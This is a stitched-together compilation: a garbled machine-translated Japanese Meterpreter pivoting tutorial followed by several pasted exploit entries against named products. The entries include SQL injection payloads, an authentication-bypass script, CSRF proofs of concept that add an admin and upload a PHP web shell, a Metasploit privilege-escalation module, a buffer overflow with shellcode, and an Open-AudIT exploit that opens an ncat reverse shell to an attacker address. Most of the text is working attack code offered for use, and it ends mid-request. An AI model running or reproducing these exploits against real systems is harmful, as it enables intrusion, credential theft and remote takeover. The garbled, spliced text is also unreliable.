以下の図では、「検索–F aa.txt」コマンドは、現在のディレクトリにaa.txtファイルとターゲットマシンの現在のディレクトリのサブディレクトリがあるかどうかを確認します。もしそうなら、それはその道を示します。
「検索-f l*.txt C: \\ pp」は、C: \\ ppのLで始まるすべてのTXTファイルと、PPフォルダーの下のすべてのサブファイルを表示します。そのようなファイルがある場合、パスとサイズを返します。
(9)コマンドを編集します
VIエディターに電話して、ターゲットホストのファイルを変更する
たとえば、ターゲットホストのホストファイルを変更して、ターゲットホストがBaiduにアクセスするときに準備されたフィッシングWebサイトに移動するようにします(実験目的のみ)
ping www.baidu.comターゲットホストでは、出てくるターゲットIPは192.168.1.1です
を変更しました
3。ネットワークコマンド
ipconfig/ifconfig#IPアドレスを含むネットワークインターフェイスに関する重要な情報を表示します
portfwd -h
使用法:portfwd [-h] [add | delete | list | flush] [args]
オプション:
-lローカルホストをオプトして聴く(オプション)
-hヘルプバナー
-l聴くためにローカルポートを選択します
-p OPTはリモートポートに接続します
-rリモートホストを選択して接続します
portfwd add -l
4444 -P 3389 -R 192.168.1.102#ポート転送、ローカル監視4444、ターゲットマシン3389をローカル4444に転送
netstat -an | grep "4444 '#view指定されたポートの開口部
rdesktop -U Administrator -P BK#123 127.0.0.1:444444444444 #use rdesktop desktop、-u username -pパスワードに接続する
rdesktop 127.1.1.0:4444 #requiresユーザー名とパスワードをリモートで接続します
ルート#被害者ルーティングテーブルを表示または変更します
ルート追加192.168.1.0 255.255.255.0 1 #ADDダイナミックルート
ルートプリント#Routingテーブル出力
runget_local_subnets#ターゲットホストのイントラネットIPセグメントステータス
ARP#ARPバッファーテーブルのルック
GetProxy #Get Proxy
(1)portfwd
ネットワークコマンドリストIP情報(IPConfig)、ルーティングテーブルの変更(ルート)、およびポート転送(PORTFWD)を表示します。たとえば、portfwd:
ルールを確立した後、リモート3389ポートが転送されるように、ローカル3344ポートに接続できます。
(2)ルート
Routeコマンドを使用して、MeterPreterセッションでイントラネットをさらに貫通します。メータープレターのリバウンドセッションを削除して生成したホストは、イントラネットから外れている可能性があります。外にナットの層があります。イントラネットの他のホストに対する攻撃を直接起動することはできません。次に、生成されたメータープレターセッションをルーティングスプリングボードとして使用して、イントラネットの他のホストを攻撃できます。
最初にrunget_local_subnetsコマンドを使用して、撮影されたターゲットホストのイントラネットIPセグメントを表示できます。
コマンド:get_local_subnetsを実行します
下の図に示すように:
そのイントラネットには192.168.249.0/24ネットワークセグメントがありますが、直接アクセスできません。
ルートをしましょう。次のホップは、現在取得したホストのセッション(現在5)です。つまり、249ネットワークセグメントのすべての攻撃トラフィックは、侵入したターゲットホストのメータープレーターセッションに通過します。
コマンド:ルート追加192.168.249.0
255.255.255.0 5
次に、ルートプリントを使用してルーティングテーブルを表示します。効果は次のとおりです。
最後に、このルートを使用して、このルートを介して249ネットワークセグメントのMS08-067の脆弱性を備えた別のホストを攻撃し、下の図に示すように、別のイントラネットホスト192.168.249.1を正常に取得できます。
ほとんどの場合、MeterPRを取得します
# Exploit Title: Netis E1+ 1.2.32533 - Backdoor Account (root)
# Date: 2020-04-25
# Author: Besim ALTINOK
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204
# Version: V1.2.32533
# Tested on: Netis E1+ V1.2.32533
# Credit: İsmail BOZKURT
-----------------------------
*root:abSQTPcIskFGc:0:0:root:/:/bin/sh*
Created directory: /home/pentestertraining/.john
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: MaxLen = 13 is too large for the current hash type, reduced
to 8*realtek (root)*
1g 0:00:00:28 3/3 0.03533g/s 1584Kp/s 1584Kc/s 1584KC/s realka2..reasll5
Use the "--show" option to display all of the cracked passwords reliably
Session completed
# Exploit Title: PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload
# Date: 2020-04-24
# Author: Besim ALTINOK
# Vendor Homepage: https://www.php-fusion.co.uk/home.php
# Software Link: https://sourceforge.net/projects/php-fusion/files/PHP-Fusion%20Archives/9.x/PHP-Fusion%209.03.50.zip/download
# Version: v9.03.50
# Tested on: Xampp
# Credit: İsmail BOZKURT and AkkuS
-------------------------------------------------------------------------------------------------
Description
---
- This system does not check the file extension when user upload photo for
avatar :). So you can upload PHP file like:
Content of the file
--
Sample PHP code: <? phpinfo(); ?>
Name of the file:
---
Sample PHP File name: tester.php
- When you want to try to upload the image to the avatar, just, try to
change the file name and content.
----------------------------------------------------------------------------------------
Vulnerable code section in the UserFieldsInput.inc
----------------------------------------------------------
private function _setUserAvatar() {
if (isset($_POST['delAvatar'])) {
if ($this->userData['user_avatar'] != "" &&
file_exists(IMAGES."avatars/".$this->userData['user_avatar']) &&
is_file(IMAGES."avatars/".$this->userData['user_avatar'])) {
unlink(IMAGES."avatars/".$this->userData['user_avatar']);
}
$this->data['user_avatar'] = '';
}
if (isset($_FILES['user_avatar']) &&
$_FILES['user_avatar']['name']) { // uploaded avatar
if (!empty($_FILES['user_avatar']) &&
is_uploaded_file($_FILES['user_avatar']['tmp_name'])) {
$upload = form_sanitizer($_FILES['user_avatar'], '',
'user_avatar');
if (isset($upload['error']) && !$upload['error']) {
// ^ maybe use empty($upload['error']) also can but
maybe low end php version has problem on empty.
$this->data['user_avatar'] = $upload['image_name'];
}
}
}
}
# Exploit Title: Netis E1+ 1.2.32533 - Unauthenticated WiFi Password Leak
# Date: 2020-04-25
# Author: Besim ALTINOK
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204
# Version: V1.2.32533
# Tested on: Netis E1+ V1.2.32533
# Credit: İsmail BOZKURT
-----------------------------
HTTP Request
-------------------------------------------
GET //netcore_get.cgi HTTP/1.1
Host: netisext.cc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0)
Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: homeFirstShow=yes
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Detail of the HTTP Response:
-------------------------------------------
hange_name':'[ ]','ddns_domain':'','ddns_info':'[ ]','time_now':'01/14/2015
09:58:51','timezone':'-8
1','time_type':'1','daylight_save':'1','time_server':'65.55.56.206','time_date':'2015','time_date2':'1','time_date3':'14','time_time':'9','time_time2':'58','time_time3':'51','old_user':'','def_pwd_flag':'1','old_pwd':'','wakeup_mac':'00:00:00:00:00:00','rp_config_status':'35','rp_client_status':'3','rp_ap_ssid':'ExampleSSID','rp_ap_password':'WiFiPass123','rp_ap_users':'1','rp_client_ssid':'TestSSID','rp_client_bssid':'98:e7:f5:ab:95:ad','rp_client_password':'WiFiPass123','rp_client_time':'357','rp_client_signals':'65','rp_client_speeds':'117','rp_roaming_onoff':'16','rp_soon_ssid':'TestSSID','rp_soon_password':'WiFiPass123','rr_current_mode':'1','rp_diagnose_status':'0',"statistics_list":[{'type':'LAN','tx_pack':'0','rx_pack':'0','t
# Exploit Title: Online shopping system advanced 1.0 - 'p' SQL Injection
# Exploit Author : Majid kalantari
# Date: 2020-04-26
# Vendor Homepage : https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software link: https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
# Version: -
# Tested on: Windows 10
# CVE: N/A
===============================================
# vulnerable file: product.php
# vulnerable parameter : p
# payload :
http://127.0.0.1:8081/phps/product.php?p=-10+union+select+1,2,3,concat(admin_email,%27----%27,admin_password),5,6,7,8+from+admin_info%23#
!
#Description: ($product_id input is not safe)
Line 46:
$product_id = $_GET['p'];
$sql = " SELECT * FROM products ";
$sql = " SELECT * FROM products WHERE product_id = $product_id";
===============================================
# Exploit Title: Online Course Registration 2.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-04-25
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/online-course-registration-free-download/
# Version: 2.0
# Tested on: Kali Linux x64 5.4.0
# CVE : N/A
#There are multiple SQL injection vulnerabilities in Online Course Registration #PHP script:
#./check_availability.php: $result =mysqli_query($con,"SELECT studentRegno FROM courseenrolls WHERE course='$cid' and studentRegno=' $regid'");
#./check_availability.php: $result =mysqli_query($con,"SELECT * FROM courseenrolls WHERE course='$cid'");
#./check_availability.php: $result1 =mysqli_query($con,"SELECT noofSeats FROM course WHERE id='$cid'");
#./change-password.php:$sql=mysqli_query($con,"SELECT password FROM students where password='".md5($_POST['cpass'])."' && studentRegno='".$_SESSION['login']."'");
#./admin/check_availability.php: $result =mysqli_query($con,"SELECT StudentRegno FROM students WHERE StudentRegno='$regno'");
#./admin/change-password.php:$sql=mysqli_query($con,"SELECT password FROM admin where password='".md5($_POST['cpass'])."' && username='".$_SESSION['alogin']."'");
#./admin/index.php:$query=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'");
#./index.php:$query=mysqli_query($con,"SELECT * FROM students WHERE StudentRegno='$regno' and password='$password'");
#./includes/header.php: $ret=mysqli_query($con,"SELECT * from userlog where studentRegno='".$_SESSION['login']."' order by id desc limit 1,1");
#./pincode-verification.php:$sql=mysqli_query($con,"SELECT * FROM students where pincode='".trim($_POST['pincode'])."' && StudentRegno='".$_SESSION['login']."'");
#It is also possible to bypass the authentication in the two login pages:
#!/usr/bin/python3
try:
from termcolor import colored
from colorama import init
import argparse
import requests
except:
print("Please run pip3 install termcolor,colorama,argparse,requests")
init()
symbol_green=colored("[+]", 'green')
symbol_red=colored("[-]", 'red')
parser = argparse.ArgumentParser()
parser.add_argument('url', help='The URL of the target.')
args = parser.parse_args()
adminurl = args.url + '/onlinecourse/admin/'
def main():
initial='Online Course Registration Authentication Bypass in %s' % ( args.url ) + "\n"
print(colored(initial, 'yellow'))
sess = requests.session()
data_login = {
'username': "admin' or 1=1 -- ",
'password': 'whatever',
'submit': ''
}
try:
req = sess.post(adminurl, data=data_login, verify=False, allow_redirects=True)
resp_code = req.status_code
except:
print(symbol_red+" The request didn't work!\n")
exit()
if resp_code == 200 and "document.chngpwd.cpass.value" in req.text:
print(symbol_green+" Authentication bypassed for admin user!\n")
print(symbol_green+" To test this manually, visit: " + adminurl+ " and enter: admin' or 1=1 -- in the username field and whatever in password field, then click the Log Me In button\n")
else:
print(symbol_red+" Fail!")
main()
# Exploit Title: Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-04-26
# Author: Besim ALTINOK
# Vendor Homepage: https://www.maiansupport.com
# Software Link: https://www.maiansupport.com/zip.html
# Version: v4.3
# Tested on: Xampp
# Credit: İsmail BOZKURT
----------------------------------------------
Here is the Detail:
--------------------------------------------------
This product is unprotected against CSRF vulnerabilities. With this attack,
you can add an admin account to the system. In addition, you can add files
from the F.A.Q field as admin.There are no file restrictions here.
Therefore, you can upload a PHP file here with CSRF.
If you want, you can add an admin account first and then access the system
and upload files.
Or you can upload files with direct admin rights.
---------------------------------------------------
CSRF PoC - 1 (Add Administrator user)
-------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/helpdesk/admin/index.php?ajax=team"
method="POST">
<input type="hidden" name="enabled" value="yes" />
<input type="hidden" name="admin" value="yes" />
<input type="hidden" name="welcome" value="yes" />
<input type="hidden" name="name" value="Besim ALTINOK" />
<input type="hidden" name="email" value="test2@gmail.com" />
<input type="hidden" name="accpass" value="111111" />
<input type="hidden" name="timezone" value="0" />
<input type="hidden" name="language" value="" />
<input type="hidden" name="addpages" value="" />
<input type="hidden" name="notePadEnable" value="yes" />
<input type="hidden" name="enableLog" value="yes" />
<input type="hidden" name="mergeperms" value="yes" />
<input type="hidden" name="profile" value="yes" />
<input type="hidden" name="ticketHistory" value="yes" />
<input type="hidden" name="close" value="yes" />
<input type="hidden" name="lock" value="yes" />
<input type="hidden" name="editperms[]" value="ticket" />
<input type="hidden" name="editperms[]" value="reply" />
<input type="hidden" name="timer" value="yes" />
<input type="hidden" name="startwork" value="yes" />
<input type="hidden" name="workedit" value="yes" />
<input type="hidden" name="notify" value="yes" />
<input type="hidden" name="spamnotify" value="yes" />
<input type="hidden" name="signature" value="" />
<input type="hidden" name="nameFrom" value="" />
<input type="hidden" name="emailFrom" value="" />
<input type="hidden" name="email2" value="" />
<input type="hidden" name="notes" value="" />
<input type="hidden" name="mailbox" value="yes" />
<input type="hidden" name="mailDeletion" value="yes" />
<input type="hidden" name="mailScreen" value="yes" />
<input type="hidden" name="mailCopy" value="yes" />
<input type="hidden" name="mailFolders" value="5" />
<input type="hidden" name="mailPurge" value="0" />
<input type="hidden" name="digest" value="yes" />
<input type="hidden" name="process" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
- After the Add admin account, you can upload the PHP file.
CSRF PoC 2 - ( Directly, File Upload)
----------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/localhost\/helpdesk\/admin\/index.php?ajax=faqattach", true);
xhr.setRequestHeader("Accept", "application\/json,
text\/javascript, *\/*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------1851832753272583700731626849");
xhr.withCredentials = true;
var body =
"-----------------------------1851832753272583700731626849\r\n" +
"Content-Disposition: form-data; name=\"file[]\";
filename=\"shell.php\"\r\n" +
"Content-Type: text/php\r\n" +
"\r\n" +
"\x3c?php echo system($_GET[\'cmd\']); ?\x3e\n" +
"\r\n" +
"-----------------------------1851832753272583700731626849\r\n" +
"Content-Disposition: form-data; name=\"file[]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------1851832753272583700731626849\r\n" +
"Content-Disposition: form-data; name=\"remote[]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------1851832753272583700731626849\r\n" +
"Content-Disposition: form-data; name=\"remote[]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------1851832753272583700731626849\r\n" +
"Content-Disposition: form-data; name=\"remote[]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------1851832753272583700731626849\r\n" +
"Content-Disposition: form-data; name=\"process\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------1851832753272583700731626849\r\n" +
"Content-Disposition: form-data; name=\"opath\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------1851832753272583700731626849--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>
HTTP Request:
-----------------------------------------------------------------------------------------
GET /helpdesk/content/attachments-faq/shell.php?cmd=ls HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0)
Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=4574c8e8190d39edd9d13a0fd9a502ec;
bp_ut_session={"pageviews":1,"referrer":"
http://localhost/olms/library/assets/js/images/","landingPage":"
http://localhost/olms/library/assets/js/images/sort_asc.html
","started":1587817504988};
HESKb910af33bb5d80030b1f4b6f8666b57fac433d4d=71c43ff24f63f83f5a34d28997251db6
Upgrade-Insecure-Requests: 1
HTTP Response:
-------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 26 Apr 2020 12:15:31 GMT
Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1f PHP/7.2.29 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/7.2.29
Content-Length: 39
Connection: close
Content-Type: text/html; charset=UTF-8
shell.php
shell_test.php
shell_test.php
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Post::Windows::Priv
include Post::Windows::Runas
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',
'Description' => %q{
This exploit leverages a vulnerability in docker desktop
community editions prior to 2.1.0.1 where an attacker can write
a payload to a lower-privileged area to be executed
automatically by the docker user at login.
},
'License' => MSF_LICENSE,
'Author' => [
'Morgan Roman', # discovery
'bwatters-r7', # metasploit module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [[ 'Automatic', {} ]],
'DefaultTarget' => 0,
'DefaultOptions' => {
'WfsDelay' => 15
},
'DisclosureDate' => '2019-07-05',
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'References' => [
['CVE', '2019-15752'],
['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']
]
)
)
register_options(
[OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]
)
end
def docker_version
output = cmd_exec('cmd.exe', '/c docker -v')
vprint_status(output)
version_string = output.match(/(\d+\.)(\d+\.)(\d)/)[0]
Gem::Version.new(version_string.split('.').map(&:to_i).join('.'))
end
def check
if docker_version <= Gem::Version.new('18.09.0')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit
check_permissions!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end
# make payload
docker_path = expand_path("#{datastore['PROGRAMDATA']}\\DockerDesktop\\version-bin")
fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path)
payload_name = 'docker-credential-wincred.exe'
payload_pathname = "#{docker_path}\\#{payload_name}"
vprint_status('Making Payload')
payload = generate_payload_exe
# upload Payload
vprint_status("Uploading Payload to #{payload_pathname}")
write_file(payload_pathname, payload)
vprint_status('Payload Upload Complete')
print_status('Waiting for user to attempt to login')
end
def check_permissions!
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
# is_in_admin_group can be nil, true, or false
end
end
# Exploit Title: Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution
# Date: 2020-04-27
# Exploit Author: 0xEmma/BugByte/SebastianPC
# Vendor Homepage: https://www.valvesoftware.com/en/
# Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302
# Tested on: MacOS 15.3
# CVE : CVE-2020-12242
import os, random, sys
banner = """
:'######:::'#######::'##::::'##::'######:::'#######::'##:::'##::::'##:::'########:
'##... ##:'##.... ##: ##:::: ##:'##... ##:'##.... ##: ##::'##:::'####:::... ##..::
##:::..:: ##'### ##: ##:::: ##: ##:::..::..::::: ##: ##:'##::::.. ##:::::: ##::::
. ######:: ## ### ##: ##:::: ##: ##::::::::'#######:: #####::::::: ##:::::: ##::::
:..... ##: ## #####:: ##:::: ##: ##::::::::...... ##: ##. ##:::::: ##:::::: ##::::
'##::: ##: ##.....::: ##:::: ##: ##::: ##:'##:::: ##: ##:. ##::::: ##:::::: ##::::
. ######::. #######::. #######::. ######::. #######:: ##::. ##::'######:::: ##::::
:......::::.......::::.......::::......::::.......:::..::::..:::......:::::..:::::
"""
print(banner)
if os.name == "posix":
command = str(input("Code to run? "))
payload = '"; ' + command + '; echo "'
f = open("/tmp/hl2_relaunch", "w")
f.write(payload)
f.close()
if os.name == "nt":
print("Windows based OS's not supported, see CVE-2020-12242")
# Exploit Title: School ERP Pro 1.0 - 'es_messagesid' SQL Injection
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT
SQL Injection Detail
--------------------------------
*# Vulnerable parameter: es_messagesid*
*# Vulnerable code:*
if($action=="fullmessage_sent"){
$msg_qry ="SELECT * FROM es_messages WHERE
from_id=".$_SESSION['eschools']['user_id']." AND from_type='student' and
es_messagesid=".*$es_messagesid;*
$details_message=$db->getrow($msg_qry);
}
?>
*Here is the SQLmap output:*
*----------------------------------------*
GET parameter '*es_messagesid*' is vulnerable.
sqlmap identified the following injection point(s):
---
Parameter: es_messagesid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT
6369=6369
Type: UNION query
Title: Generic UNION query (random number) - 12 columns
Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL
SELECT
6194,6194,6194,6194,6194,6194,CONCAT(0x7162626b71,0x664750636f625866666c63425571426c5277516c49506c696f6548764c5a617977414d4849575a67,0x71707a7671),6194,6194,6194,6194,6194--
-
---
[01:09:41] [INFO] testing MySQL
[01:09:42] [INFO] confirming MySQL
[01:09:44] [INFO] the back-end DBMS is MySQL
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)
# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution
# Date: 2020-04-22
# Exploit Author: Askar
# CVE: CVE-2020-8813
# Vendor Homepage: https://opmantek.com/
# Version: v3.3.1
# Tested on: Ubuntu 18.04 / PHP 7.2.24
#!/usr/bin/python3
import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) != 6:
print("[~] Usage : ./openaudit-exploit.py url username password ip port")
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
request = requests.session()
def inject_payload():
configuration_path = url+"/en/omk/open-audit/configuration/90"
data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
request.patch(configuration_path, data)
print("[+] Payload injected in settings")
def start_discovery():
discovery_path = url+"/en/omk/open-audit/discoveries/create"
post_discovery_path = url+"/en/omk/open-audit/discoveries"
scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)])
req = request.get(discovery_path)
response = req.text
soup = BeautifulSoup(response, "html5lib")
token = soup.findAll('input')[5].get("value")
buttons = soup.findAll("button")
headers = {"Referer" : discovery_path}
request_data = {
"data[attributes][name]":scan_name,
"data[attributes][other][subnet]":"10.10.10.1/24",
"data[attributes][other][ad_server]":"",
"data[attributes][other][ad_domain]":"",
"submit":"",
"data[type]":"discoveries",
"data[access_token]":token,
"data[attributes][complete]":"y",
"data[attributes][org_id]":"1",
"data[attributes][type]":"subnet",
"data[attributes][devices_assigned_to_org]":"",
"data[attributes][devices_assigned_to_location]":"",
"data[attributes][other][nmap][discovery_scan_option_id]":"1",
"data[attributes][other][nmap][ping]":"y",
"data[attributes][other][nmap][service_version]":"n",
"data[attributes][other][nmap][open|filtered]":"n",
"data[attributes][other][nmap][filtered]":"n",
"data[attributes][other][nmap][timing]":"4",
"data[attributes][other][nmap][nmap_tcp_ports]":"0",
"data[attributes][other][nmap][nmap_udp_ports]":"0",
"data[attributes][other][nmap][tcp_ports]":"22,135,62078",
"data[attributes][other][nmap][udp_ports]":"161",
"data[attributes][other][nmap][timeout]":"",
"data[attributes][other][nmap][exclude_tcp_ports]":"",
"data[attributes][other][nmap][exclude_udp_ports]":"",
"data[attributes][other][nmap][exclude_ip]":"",
"data[attributes][other][nmap][ssh_ports]":"22",
"data[attributes][other][match][match_dbus]":"",
"data[attributes][other][match][match_fqdn]":"",
"data[attributes][other][match][match_dns_fqdn]":"",
"data[attributes][other][match][match_dns_hostname]":"",
"data[attributes][other][match][match_hostname]":"",
"data[attributes][other][match][match_hostname_dbus]":"",
"data[attributes][other][match][match_hostname_serial]":"",
"data[attributes][other][match][match_hostname_uuid]":"",
"data[attributes][other][match][match_ip]":"",
"data[attributes][other][match][match_ip_no_data]":"",
"data[attributes][other][match][match_mac]":"",
"data[attributes][other][match][match_mac_vmware]":"",
"data[attributes][other][match][match_serial]":"",
"data[attributes][other][match][match_serial_type]":"",
"data[attributes][other][match][match_sysname]":"",
"data[attributes][other][match][match_sysname_serial]":"",
"data[attributes][other][match][match_uuid]":""
}
print("[+] Creating discovery ..")
req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
disocvery_url = url + req.headers['Location'] + "/execute"
print("[+] Triggering payload ..")
print("[+] Check your nc ;)")
request.get(disocvery_url)
def login():
login_info = {
"redirect_url": "/en/omk/open-audit",
"username": username,
"password": password
}
login_request = request.post(url+"/en/omk/open-audit/login", login_info)
login_text = login_request.text
if "There was an error authenticating" in login_text:
return False
else:
return True
if login():
print("[+] LoggedIn Successfully")
inject_payload()
start_discovery()
else:
print("[-] Cannot login!")
# Exploit Title: School ERP Pro 1.0 - Remote Code Execution
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT
Description
-------------------------------------------
A student can send a message to the admin. Additionally, with this method,
the student can upload a PHP file to the system and run code in the system.
------------------------------------
*Vulnerable code - 1: (for student area) - sendmail.inc.php*
- Student user can send message to admin with the attachment
------------------------------------
$image_file = basename($_FILES['newimage']['name'][$i]);
$ext=explode(".",$_FILES['newimage']['name'][$i]);
$str=date("mdY_hms");
//$t=rand(1, 15);
$new_thumbname = "$ext[0]".$str.$t.".".$ext[1];
$updir = "images/messagedoc/";
$dest_path = $updir.$new_thumbname;
$up_images[$i] = $dest_path;
$srcfile = $_FILES['newimage']['tmp_name'][$i];
@move_uploaded_file($srcfile, $dest_path);
$ins_arr_prod_images = array(
'`es_messagesid`' => $id,
'`message_doc`' => $new_thumbname
);
$idss=$db->insert("es_message_documents",$ins_arr_prod_images);
---------------------------------------------------
*PoC of the Remote Code Execution*
---------------------------------------------------
POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***************************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin
Content-Type: multipart/form-data;
